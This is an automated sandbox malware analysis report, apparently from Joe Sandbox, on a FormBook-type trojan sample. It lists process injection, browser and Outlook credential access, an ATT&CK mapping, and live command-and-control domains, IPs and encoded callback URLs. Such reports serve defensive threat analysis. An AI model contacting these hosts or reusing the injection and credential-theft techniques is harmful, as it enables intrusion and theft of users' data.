            Source: qvXzWppcWJ.exe, 00000007.00000000.2486690962.0000000000D11000.00000002.00000001.00040000.00000000.sdmp, qvXzWppcWJ.exe, 00000007.00000002.3360415994.0000000000D10000.00000002.00000001.00040000.00000000.sdmp, qvXzWppcWJ.exe, 00000009.00000002.3361534903.0000000000C50000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: IProgram Manager
            Source: lPX6PixV4t.exe, qvXzWppcWJ.exe, 00000007.00000000.2486690962.0000000000D11000.00000002.00000001.00040000.00000000.sdmp, qvXzWppcWJ.exe, 00000007.00000002.3360415994.0000000000D10000.00000002.00000001.00040000.00000000.sdmp, qvXzWppcWJ.exe, 00000009.00000002.3361534903.0000000000C50000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: qvXzWppcWJ.exe, 00000007.00000000.2486690962.0000000000D11000.00000002.00000001.00040000.00000000.sdmp, qvXzWppcWJ.exe, 00000007.00000002.3360415994.0000000000D10000.00000002.00000001.00040000.00000000.sdmp, qvXzWppcWJ.exe, 00000009.00000002.3361534903.0000000000C50000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: qvXzWppcWJ.exe, 00000007.00000000.2486690962.0000000000D11000.00000002.00000001.00040000.00000000.sdmp, qvXzWppcWJ.exe, 00000007.00000002.3360415994.0000000000D10000.00000002.00000001.00040000.00000000.sdmp, qvXzWppcWJ.exe, 00000009.00000002.3361534903.0000000000C50000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: lPX6PixV4t.exeBinary or memory string: JDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning
            Source: C:\Users\user\Desktop\lPX6PixV4t.exeCode function: 0_2_004720DB GetLocalTime,__swprintf,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,0_2_004720DB
            Source: C:\Users\user\Desktop\lPX6PixV4t.exeCode function: 0_2_00472C3F GetUserNameW,0_2_00472C3F
            Source: C:\Users\user\Desktop\lPX6PixV4t.exeCode function: 0_2_0041E364 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,0_2_0041E364
            Source: C:\Users\user\Desktop\lPX6PixV4t.exeCode function: 0_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary,0_2_0040E500

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000009.00000002.3363834268.0000000004A30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.3354933145.00000000030F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2563421707.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2563714383.0000000003690000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2564107647.0000000004800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.3361592338.0000000004D50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.3361654877.0000000004DA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.3360961972.0000000002E00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\write.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\write.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\write.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\write.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Windows\SysWOW64\write.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\write.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\write.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\write.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\write.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
            Source: lPX6PixV4t.exeBinary or memory string: WIN_XP
            Source: lPX6PixV4t.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPWIN_2000InstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 8, 1USERPROFILEUSERDOMAINUSERDNSDOMAINDefaultGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYadvapi32.dllRegDeleteKeyExW+.-.+-\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]ISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXISTSEXPANDmsctls_statusbar321tooltips_class32AutoIt v3 GUI%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----&
            Source: lPX6PixV4t.exeBinary or memory string: WIN_XPe
            Source: lPX6PixV4t.exeBinary or memory string: WIN_VISTA
            Source: lPX6PixV4t.exeBinary or memory string: WIN_7
            Source: lPX6PixV4t.exeBinary or memory string: WIN_8

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000009.00000002.3363834268.0000000004A30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.3354933145.00000000030F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2563421707.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2563714383.0000000003690000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2564107647.0000000004800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.3361592338.0000000004D50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.3361654877.0000000004DA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.3360961972.0000000002E00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\lPX6PixV4t.exeCode function: 0_2_004652BE socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,0_2_004652BE
            Source: C:\Users\user\Desktop\lPX6PixV4t.exeCode function: 0_2_00476619 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00476619
            Source: C:\Users\user\Desktop\lPX6PixV4t.exeCode function: 0_2_0046CEF3 OleInitialize,_wcslen,CreateBindCtx,MkParseDisplayName,CLSIDFromProgID,GetActiveObject,0_2_0046CEF3
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire Infrastructure2
            Valid Accounts
            1
            Native API
            1
            DLL Side-Loading
            1
            Exploitation for Privilege Escalation
            1
            Disable or Modify Tools
            1
            OS Credential Dumping
            2
            System Time Discovery
            Remote Services1
            Archive Collected Data
            4
            Ingress Tool Transfer
            Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault Accounts2
            Command and Scripting Interpreter
            2
            Valid Accounts
            1
            Abuse Elevation Control Mechanism
            1
            Deobfuscate/Decode Files or Information
            21
            Input Capture
            1
            Account Discovery
            Remote Desktop Protocol1
            Data from Local System
            1
            Encrypted Channel
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading
            1
            Abuse Elevation Control Mechanism
            Security Account Manager2
            File and Directory Discovery
            SMB/Windows Admin Shares1
            Email Collection
            4
            Non-Application Layer Protocol
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
            Valid Accounts
            3
            Obfuscated Files or Information
            NTDS16
            System Information Discovery
            Distributed Component Object Model21
            Input Capture
            4
            Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
            Access Token Manipulation
            1
            DLL Side-Loading
            LSA Secrets141
            Security Software Discovery
            SSH3
            Clipboard Data
            Fallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts412
            Process Injection
            2
            Valid Accounts
            Cached Domain Credentials2
            Virtualization/Sandbox Evasion
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
            Virtualization/Sandbox Evasion
            DCSync3
            Process Discovery
            Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
            Access Token Manipulation
            Proc Filesystem11
            Application Window Discovery
            Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt412
            Process Injection
            /etc/passwd and /etc/shadow1
            System Owner/User Discovery
            Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1529804 Sample: lPX6PixV4t.exe Startdate: 09/10/2024 Architecture: WINDOWS Score: 100 28 www.93187.xyz 2->28 30 xzwp.g.zxy-cname.com 2->30 32 10 other IPs or domains 2->32 42 Multi AV Scanner detection for domain / URL 2->42 44 Suricata IDS alerts for network traffic 2->44 46 Malicious sample detected (through community Yara rule) 2->46 50 5 other signatures 2->50 10 lPX6PixV4t.exe 1 2->10         started        signatures3 48 Performs DNS queries to domains with low reputation 28->48 process4 signatures5 62 Writes to foreign memory regions 10->62 64 Maps a DLL or memory area into another process 10->64 66 Switches to a custom stack to bypass stack traces 10->66 13 svchost.exe 10->13         started        process6 signatures7 68 Maps a DLL or memory area into another process 13->68 16 qvXzWppcWJ.exe 13->16 injected process8 signatures9 40 Found direct / indirect Syscall (likely to bypass EDR) 16->40 19 write.exe 13 16->19         started        process10 signatures11 52 Tries to steal Mail credentials (via file / registry access) 19->52 54 Tries to harvest and steal browser information (history, passwords, etc) 19->54 56 Modifies the context of a thread in another process (thread injection) 19->56 58 3 other signatures 19->58 22 qvXzWppcWJ.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 www.zenscape.top 199.192.21.169, 49996, 49997, 49999 NAMECHEAP-NETUS United States 22->34 36 xzwp.g.zxy-cname.com 52.187.43.40, 49992, 49993, 49994 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 22->36 38 3 other IPs or domains 22->38 60 Found direct / indirect Syscall (likely to bypass EDR) 22->60 signatures14

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            lPX6PixV4t.exe67%ReversingLabsWin32.Trojan.AutoitInject
            lPX6PixV4t.exe40%VirustotalBrowse
            lPX6PixV4t.exe100%AviraHEUR/AGEN.1321671
            lPX6PixV4t.exe100%Joe Sandbox ML
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            www.zenscape.top1%VirustotalBrowse
            asociacia.online2%VirustotalBrowse
            whats-in-the-box.org2%VirustotalBrowse
            www.93187.xyz1%VirustotalBrowse
            www.asociacia.online2%VirustotalBrowse
            www.1183377.app1%VirustotalBrowse
            www.whats-in-the-box.org1%VirustotalBrowse
            www.52ywq.vip0%VirustotalBrowse
            SourceDetectionScannerLabelLink
            https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
            https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
            https://duckduckgo.com/ac/?q=0%URL Reputationsafe
            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
            https://www.ecosia.org/newtab/0%URL Reputationsafe
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
            http://www.asociacia.online2%VirustotalBrowse
            http://www.1183377.app/8z5k/6%VirustotalBrowse
            https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%VirustotalBrowse
            http://www.52ywq.vip/4i87/2%VirustotalBrowse
            http://www.asociacia.online/jsqu/2%VirustotalBrowse
            http://www.zenscape.top/d8cw/2%VirustotalBrowse
            NameIPActiveMaliciousAntivirus DetectionReputation
            www.zenscape.top
            199.192.21.169
            truetrueunknown
            asociacia.online
            81.2.196.19
            truetrueunknown
            hse6978h2.g.asiagoogleantiddoscdn.com
            23.224.37.78
            truetrue
              unknown
              whats-in-the-box.org
              3.33.130.190
              truetrueunknown
              www.93187.xyz
              107.163.130.249
              truetrueunknown
              xzwp.g.zxy-cname.com
              52.187.43.40
              truetrue
                unknown
                www.asociacia.online
                unknown
                unknowntrueunknown
                www.52ywq.vip
                unknown
                unknowntrueunknown
                www.whats-in-the-box.org
                unknown
                unknowntrueunknown
                www.1183377.app
                unknown
                unknowntrueunknown
                NameMaliciousAntivirus DetectionReputation
                http://www.52ywq.vip/4i87/trueunknown
                http://www.zenscape.top/d8cw/?rtR8=ygF20N1+ik7kBOtBXXgSSDl+0mvoPS6R8XEst5j0lvkfFXMCnxh1w4hdkVa8euGiR7K2W9wNoXO2NDH8py5opn2u7JXGpupl6T4qEm+uZVqNQYYUUMV8Z2PKg+70/6v6dkPbd3Q=&0Xm=T0UhHtW0dnoXGz2ptrue
                  unknown
                  http://www.1183377.app/8z5k/trueunknown
                  http://www.asociacia.online/jsqu/trueunknown
                  http://www.52ywq.vip/4i87/?rtR8=tX1gPPm4vGDAfdGb/LV0WNIl4Jkrf3fdzqWbffI0WxOtalbv2UCR6RvwOqtQuPJgvEbTjd3YUbROaC6Ux6KVtYIHl0Afz9YtPbMVCSGGc6Kk1GcbeTEHqh6wASkybV6fO9grfsM=&0Xm=T0UhHtW0dnoXGz2ptrue
                    unknown
                    http://www.zenscape.top/d8cw/trueunknown
                    http://www.asociacia.online/jsqu/?0Xm=T0UhHtW0dnoXGz2p&rtR8=j6JGavFFAQYaoSsk3MdZismLyTuecDBS/zrFTn0tpA7YEGIVc6EsUszyewNJDeJ1aRTf+dmReaRifudBLpLuEFCvWuSXUwpZ7h17BCkWHwRJfu54vPrIhvPMzvKdYKZDJ4eC1+o=true
                      unknown
                      NameSourceMaliciousAntivirus DetectionReputation
                      https://ac.ecosia.org/autocomplete?q=write.exe, 00000008.00000003.2747036161.000000000824E000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://duckduckgo.com/chrome_newtabwrite.exe, 00000008.00000003.2747036161.000000000824E000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://duckduckgo.com/ac/?q=write.exe, 00000008.00000003.2747036161.000000000824E000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://www.google.com/images/branding/product/ico/googleg_lodp.icowrite.exe, 00000008.00000003.2747036161.000000000824E000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                      https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchwrite.exe, 00000008.00000003.2747036161.000000000824E000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://www.asociacia.onlineqvXzWppcWJ.exe, 00000009.00000002.3363834268.0000000004A9B000.00000040.80000000.00040000.00000000.sdmpfalseunknown
                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=write.exe, 00000008.00000003.2747036161.000000000824E000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://6329.vhjhbv.com/4i87/?rtR8=tX1gPPm4vGDAfdGb/LV0WNIl4Jkrf3fdzqWbffI0WxOtalbv2UCR6RvwOqtQuPJgvwrite.exe, 00000008.00000002.3364123267.0000000005CF8000.00000004.10000000.00040000.00000000.sdmp, qvXzWppcWJ.exe, 00000009.00000002.3362095361.0000000002D08000.00000004.00000001.00040000.00000000.sdmpfalse
                        unknown
                        https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=write.exe, 00000008.00000003.2747036161.000000000824E000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        https://www.ecosia.org/newtab/write.exe, 00000008.00000003.2747036161.000000000824E000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=write.exe, 00000008.00000003.2747036161.000000000824E000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs
                        IPDomainCountryFlagASNASN NameMalicious
                        199.192.21.169
                        www.zenscape.topUnited States
                        22612NAMECHEAP-NETUStrue
                        52.187.43.40
                        xzwp.g.zxy-cname.comUnited States
                        8075MICROSOFT-CORP-MSN-AS-BLOCKUStrue
                        23.224.37.78
                        hse6978h2.g.asiagoogleantiddoscdn.comUnited States
                        40065CNSERVERSUStrue
                        81.2.196.19
                        asociacia.onlineCzech Republic
                        24806INTERNET-CZKtis238403KtisCZtrue
                        3.33.130.190
                        whats-in-the-box.orgUnited States
                        8987AMAZONEXPANSIONGBtrue
                        Joe Sandbox version:41.0.0 Charoite
                        Analysis ID:1529804
                        Start date and time:2024-10-09 12:41:06 +02:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:0h 8m 31s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                        Number of analysed new started processes analysed:9
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:2
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Sample name:lPX6PixV4t.exe
                        renamed because original name is a hash value
                        Original Sample Name:20c72b8fedc9a01361a10d32b510de20deaba414716db9fd6134f9eb8fe8747b.exe
                        Detection:MAL
                        Classification:mal100.troj.spyw.evad.winEXE@7/2@6/5
                        EGA Information:
                        • Successful, ratio: 75%
                        HCA Information:
                        • Successful, ratio: 98%
                        • Number of executed functions: 53
                        • Number of non-executed functions: 301
                        Cookbook Comments:
                        • Found application associated with file extension: .exe
                        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                        • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                        • Execution Graph export aborted for target qvXzWppcWJ.exe, PID 2168 because it is empty
                        • Report creation exceeded maximum time and may have missing disassembly code information.
                        • Report size exceeded maximum capacity and may have missing disassembly code.
                        TimeTypeDescription
                        06:43:16API Interceptor969856x Sleep call for process: write.exe modified
                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        199.192.21.169Z6s208B9QX.exeGet hashmaliciousFormBookBrowse
                        • www.zenscape.top/d8cw/
                        8mmZ7Bkoj1.exeGet hashmaliciousFormBookBrowse
                        • www.cenfresh.life/6iok/
                        PURCHASE ORDER.exeGet hashmaliciousFormBookBrowse
                        • www.selftip.top/85su/
                        update SOA.exeGet hashmaliciousFormBookBrowse
                        • www.technectar.top/ghvt/
                        NVOICE FOR THE MONTH OF AUG-24.exeGet hashmaliciousFormBookBrowse
                        • www.selftip.top/85su/
                        RFQ - HTS45785-24-0907I000.exeGet hashmaliciousFormBookBrowse
                        • www.zenscape.top/d8cw/
                        Request for Quotation Hi-Tech Park Project 193200.exeGet hashmaliciousFormBookBrowse
                        • www.zenscape.top/d8cw/
                        DEBIT NOTE 01ST SEP 2024.exeGet hashmaliciousFormBookBrowse
                        • www.selftip.top/85su/
                        DCP11-83642024..exeGet hashmaliciousFormBookBrowse
                        • www.urbanpulse.help/r50h/
                        PROFOMA INVOICE SHEET.exeGet hashmaliciousFormBookBrowse
                        • www.selftip.top/85su/
                        52.187.43.40PURCHASE ORDER-6350.exeGet hashmaliciousFormBookBrowse
                        • www.52ywq.vip/ujoo/
                        Arrival Notice_pdf.exeGet hashmaliciousFormBookBrowse
                        • www.52ywq.vip/gu3y/
                        81.2.196.19Z6s208B9QX.exeGet hashmaliciousFormBookBrowse
                        • www.asociacia.online/jsqu/
                        POPO00003964.exeGet hashmaliciousFormBookBrowse
                        • www.kovallo.cloud/kmgk/?86_x=QukKnG46OQSX7O0/pGHQhAZNgDjtAZwvhEJu7ZdGlt3+bssdK2PjljXXjRv2eFs2wJoIh8oMTDRJEFcKnARzR1AiHrybfE9RbtwBnUJQUZ6Y2f2hOH45l3g=&bVi=_BPd
                        YSjOEAta07.exeGet hashmaliciousFormBookBrowse
                        • www.kovallo.cloud/kmgk/
                        RFQ - HTS45785-24-0907I000.exeGet hashmaliciousFormBookBrowse
                        • www.asociacia.online/jsqu/
                        Request for Quotation Hi-Tech Park Project 193200.exeGet hashmaliciousFormBookBrowse
                        • www.asociacia.online/jsqu/
                        PO2024033194.exeGet hashmaliciousFormBookBrowse
                        • www.kovallo.cloud/kmgk/
                        SOLICITUD DE COTIZACI#U00d3N - 6721000232111.exeGet hashmaliciousFormBookBrowse
                        • www.asociacia.online/jsqu/
                        New Purchase Order.exeGet hashmaliciousFormBookBrowse
                        • www.asociacia.online/onev/
                        Sandflugters.exeGet hashmaliciousFormBook, GuLoaderBrowse
                        • www.efektivniterapie.online/tsq7/
                        SSCTEC9201.exeGet hashmaliciousFormBookBrowse
                        • www.sedrik-osvald.online/m2x5/?YvT=KDH4Ppt8a8oLaN3p&v2J=B8Bd0Sfq77kDc24XyFdDXGPlMrQ7NxXLrTlUZzrnlAP4fhGKbqg2y3GNcrlB5q+LumL4VPx44Q==
                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        www.93187.xyzZ6s208B9QX.exeGet hashmaliciousFormBookBrowse
                        • 107.163.130.249
                        PO For Bulk Order.exeGet hashmaliciousFormBookBrowse
                        • 107.163.130.249
                        RFQ - HTS45785-24-0907I000.exeGet hashmaliciousFormBookBrowse
                        • 107.163.130.249
                        SOLICITUD DE COTIZACI#U00d3N - 6721000232111.exeGet hashmaliciousFormBookBrowse
                        • 107.163.130.249
                        New Purchase Order.exeGet hashmaliciousFormBookBrowse
                        • 107.163.130.249
                        xzwp.g.zxy-cname.comZ6s208B9QX.exeGet hashmaliciousFormBookBrowse
                        • 20.184.53.162
                        PURCHASE ORDER-6350.exeGet hashmaliciousFormBookBrowse
                        • 52.187.43.40
                        Arrival Notice_pdf.exeGet hashmaliciousFormBookBrowse
                        • 52.187.43.40
                        PO23100072.exeGet hashmaliciousFormBookBrowse
                        • 52.230.28.86
                        RFQ - HTS45785-24-0907I000.exeGet hashmaliciousFormBookBrowse
                        • 52.187.43.73
                        PO-000001488.exeGet hashmaliciousFormBookBrowse
                        • 52.187.42.58
                        List of Items0001.doc.exeGet hashmaliciousFormBook, GuLoaderBrowse
                        • 13.76.137.44
                        Request for Quotation Hi-Tech Park Project 193200.exeGet hashmaliciousFormBookBrowse
                        • 52.230.28.86
                        SOLICITUD DE COTIZACI#U00d3N - 6721000232111.exeGet hashmaliciousFormBookBrowse
                        • 13.76.139.81
                        hse6978h2.g.asiagoogleantiddoscdn.comZ6s208B9QX.exeGet hashmaliciousFormBookBrowse
                        • 23.224.37.76
                        DHL_ 46773482.exeGet hashmaliciousFormBookBrowse
                        • 156.251.233.85
                        RFQ - HTS45785-24-0907I000.exeGet hashmaliciousFormBookBrowse
                        • 23.224.27.173
                        www.zenscape.topZ6s208B9QX.exeGet hashmaliciousFormBookBrowse
                        • 199.192.21.169
                        RFQ - HTS45785-24-0907I000.exeGet hashmaliciousFormBookBrowse
                        • 199.192.21.169
                        Request for Quotation Hi-Tech Park Project 193200.exeGet hashmaliciousFormBookBrowse
                        • 199.192.21.169
                        SOLICITUD DE COTIZACI#U00d3N - 6721000232111.exeGet hashmaliciousFormBookBrowse
                        • 199.192.21.169
                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        MICROSOFT-CORP-MSN-AS-BLOCKUSDoc_0211.zipGet hashmaliciousUnknownBrowse
                        • 13.89.179.9
                        U0440df'.msgGet hashmaliciousHTMLPhisherBrowse
                        • 104.47.11.156
                        na.elfGet hashmaliciousUnknownBrowse
                        • 159.27.209.241
                        na.elfGet hashmaliciousMiraiBrowse
                        • 13.71.38.150
                        na.elfGet hashmaliciousMiraiBrowse
                        • 21.111.67.72
                        na.elfGet hashmaliciousMiraiBrowse
                        • 52.107.25.221
                        na.elfGet hashmaliciousMiraiBrowse
                        • 20.95.227.140
                        na.elfGet hashmaliciousMiraiBrowse
                        • 22.48.23.11
                        na.elfGet hashmaliciousMiraiBrowse
                        • 13.90.63.134
                        na.elfGet hashmaliciousMiraiBrowse
                        • 21.182.196.142
                        CNSERVERSUSna.elfGet hashmaliciousMiraiBrowse
                        • 23.224.58.152
                        NLHiAJgSnj.elfGet hashmaliciousUnknownBrowse
                        • 154.90.62.142
